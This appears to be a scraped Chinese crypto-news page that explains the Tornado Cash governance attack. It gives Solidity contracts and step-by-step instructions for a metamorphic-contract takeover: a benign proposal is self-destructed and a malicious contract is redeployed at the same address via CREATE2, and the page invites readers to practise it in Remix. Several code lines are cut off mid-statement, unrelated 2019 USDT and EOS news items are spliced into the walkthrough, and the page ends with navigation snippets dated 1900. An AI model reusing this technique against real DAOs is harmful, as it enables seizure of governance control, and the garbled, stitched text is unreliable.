大概两周前(5 月 20 日),知名混币协议 Tornado Cash 遭受到治理攻击,黑客获取到了Tornado Cash的治理合约的控制权(Owner)。
攻击过程是这样的:攻击者先提交了一个“看起来正常”的提案, 待提案通过之后, 销毁了提案要执行的合约地址, 并在该地址上重新创建了一个攻击合约。
攻击过程可以查看 SharkTeam 的 Tornado
address public owner = msg
function execute(uint256 proposalId) external payable { Proposal storage proposal = proposals[proposalId]; require(proposal
}contract Proposal { event Log(string message); function executeProposal() external { emit Log("Excuted code approved by DAO"); } function emergencyStop() external { selfdestruct(payable(address(0))); }}contract Attack { event Log(string message); address public owner; function executeProposal() external { emit Log("Excuted code not approved by DAO :)"); // For example - set DAO's owner to attacker owner = msg
}contract DeployerDeployer { event Log(address addr); function deploy() external { bytes32 salt = keccak256(abi
}contract Deployer { event Log(address addr); function deployProposal() external { address addr = address(new Proposal()); emit Log(addr); } function deployAttack() external { address addr = address(new Attack()); emit Log(addr); } function kill() external { selfdestruct(payable(address(0))); }}大家可以使用该代码自己在 Remix 中演练一下。
分析 | USDT听证会解析:瑞海君看币观点:一、预计听证会围绕的主题有如下两个:
1.Bitfinex和Tether不顾美国法律和监管,为纽约州居民提供了相关服务。
2.Bitfinex和Tether之前在美国的业务,触犯了美国的反法(这个才是对USDT具有巨大杀伤力的议题)。
二、?今晚可能达成的几种结果:
1.BFX和Tether违规为美国居民提供服务罪名成立,会导致两家共识会继续被调查,且会被美国要求提供更多的运营资料,的事情没结果,但是也要提交更多资料自正清白,这是利空!会导致USDT这个雷持续悬在整个币圈的头上,然后美国来一条新闻,币圈震动一次,简直就是噩梦。(概率中性)
行情影响:短暂反弹,然后继续震荡阴跌。
2.两项罪名都没结果,短暂利好,BFX继续和美国扯皮,大家松一口气暂时?,价格可能出现反弹。(可能性较大)
行情影响:短暂反弹,后市宽幅震荡为主。
3.两项罪名都成立,不可想像(可能性较小)!
行情影响:区块链局。
罪名直接成立可能性也较小,调查没那么快,所以请大家系好安全带,等待靴子落地,两只靴子到底如何落地,落地几支,只有静候今晚的听证会了。[2019/7/29]
首先部署 DeployerDeployer , 调用 DeployerDeployer.deploy() 部署 Deployer , 然后调用 Deployer.deployProposal() 部署 Proposal 。
动态 | EOS疑似将推出基于EOS的HandShake DNS解析服务:EOS疑似将推出基于EOS 的 HandShake DNS解析服务,一位开发者的Github显示正在开发EOS-handshake服务。Cosmos社区总监Chjango Unchained4月30日发推表示发现EOS开发者正在复用 Handshake 的开源代码。EOS或许会加入域名解析服务,生态会进一步扩大。(IMEOS)[2019/4/30]
拿到 Proposal 提案合约地址后, 向 DAO 发起提案。
分别调用 Deployer.kill 和 Proposal.emergencyStop 销毁掉 Deployer 和 Proposal
再次调用 DeployerDeployer.deploy() 部署 Deployer , 调用 Deployer.deployAttack() 部署 Attack , Attack 将和之前的 Proposal 一致。
执行 DAO.execute 时,攻击完成 获取到了 DAO 的 Owner 权限。
区块律动BlockBeats
曼昆区块链法律
Foresight News
GWEI Research
吴说区块链
西柚yoga
ETH中文
金色早8点
金色财经 子木
ABCDE
0xAyA
文:Andre Cronje来源:medium丰富的数据源是互联网发展的基础。由于API (预言机),静态页面变成了动态数据.
1900/1/1 0:00:00DeFi数据1、DeFi代币总市值:379.54亿美元 DeFi总市值及前十代币 数据来源:coingecko2、过去24小时去中心化交易所的交易量20.
1900/1/1 0:00:00文:RACHEL WOLFSON为了使“实物”NFT项目获得吸引力,必须克服许多挑战。尽管经历了加密寒冬,但非同质化代币(NFT)继续吸引人们的兴趣.
1900/1/1 0:00:00原文作者:Matías Andrade、Kyle Waters原文来源:Coin Metrics原文编译:DeFi 之道去中心化金融(DeFi)是一种快速增长的区块链技术应用,旨在提供金融服务.
1900/1/1 0:00:00原文作者:CoinGecko - Joel Agbo 原创编译:BlockTurbo追踪加密货币钱包主要有三步:发现钱包、收集钱包链上交易的深度数据,以及将前两步获取的数据翻译成有用的信息.
1900/1/1 0:00:00作者:SU YEN CHIA,KULLARAT,Forkast;编译:松雪,金色财经代币化是通过区块链上的智能合约以数字方式表示资产、权利或有价值的物品的过程,近年来引起了广泛关注.
1900/1/1 0:00:00